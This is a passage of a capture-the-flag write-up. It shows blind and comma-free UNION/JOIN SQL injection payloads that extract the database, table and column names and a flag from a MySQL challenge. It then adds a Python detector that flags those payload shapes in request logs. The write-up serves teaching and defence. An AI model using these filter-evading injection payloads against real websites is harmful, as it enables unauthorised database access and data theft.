Next I tried to dump the database, but nothing came back, so the only option left was manual injection. Here I chose boolean-based blind injection, because its response is easier to read than a time-based one. Submitting the parameter 1' and ascii(substr((select database()),1,1))>64 %23 to query the database name, the injection failed: the rest of the SQL statement had been filtered out, and the id field in the output appears to be the filtered SQL statement.
I found an article online on MySQL injection without commas, http://wonderkun.cc/index.html/?p=442, and rebuilt the payload along those lines, e.g. id=-1' union select * from (select group_concat(distinct(table_schema)) from information_schema.tables ) a join (select version() ) b %23. The result shows the database name is sqli.
Next, the payload to get the table names: -1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23
The payload to get the column names: -1' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join (select version() ) b %23
The payload to get the column value, which yields flag{34303304-de0b-4bad-a0df-84eb8a420df8}: -1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select version() ) b %23
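The comma-free shape used above (a UNION over derived subqueries glued together with JOIN) slips past filters and log rules that only look for comma-separated column lists. As an added example that is not part of the original writeup, here is a small Python detector that flags that shape, the blind ascii/substr probe and information_schema lookups in request log lines; the rule names and the sample requests are constructed for this illustration.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed sample query strings (not real traffic). The last two mirror the
# shapes in the writeup: a comma-based blind probe and the comma-free UNION/JOIN form.
SAMPLE_REQUESTS = [
    "id=5",
    "id=12&page=2",
    "id=1' and ascii(substr((select database()),1,1))>64 %23",
    "id=-1' union select * from (select group_concat(distinct(table_schema)) "
    "from information_schema.tables ) a join (select version() ) b %23",
]

# Each rule is (name, regex) and is matched against the decoded, lower-cased value.
RULES = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    # "(select ...) a join (select ...) b": derived tables joined by alias, which
    # lets a UNION return several columns without a single comma in the payload.
    ("comma_free_join", re.compile(r"\)\s*\w+\s+join\s*\(\s*select\b")),
    ("schema_probe", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("blind_charcmp", re.compile(r"\bascii\s*\(\s*substr")),
    ("comment_terminator", re.compile(r"(#|--\s|/\*)\s*$")),
]


def decode_param(query_string: str, name: str) -> Optional[str]:
    """Return the URL-decoded value of `name` from a raw query string, or None."""
    for pair in query_string.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)  # %23 -> '#', %27 -> "'", '+' -> ' '
    return None


def classify(query_string: str, param: str = "id") -> List[str]:
    """Return the names of every rule that fires on the given parameter value."""
    value = decode_param(query_string, param)
    if value is None:
        return []
    lowered = value.lower()
    return [name for name, pattern in RULES if pattern.search(lowered)]


def scan(requests: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious request to its fired rules; clean requests are omitted."""
    return {q: hits for q in requests if (hits := classify(q))}


if __name__ == "__main__":
    for q, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{', '.join(hits):55s} <- {q}")
```

Decoding before matching matters: the %23 in the logged request is what turns into the trailing # comment that the last rule keys on.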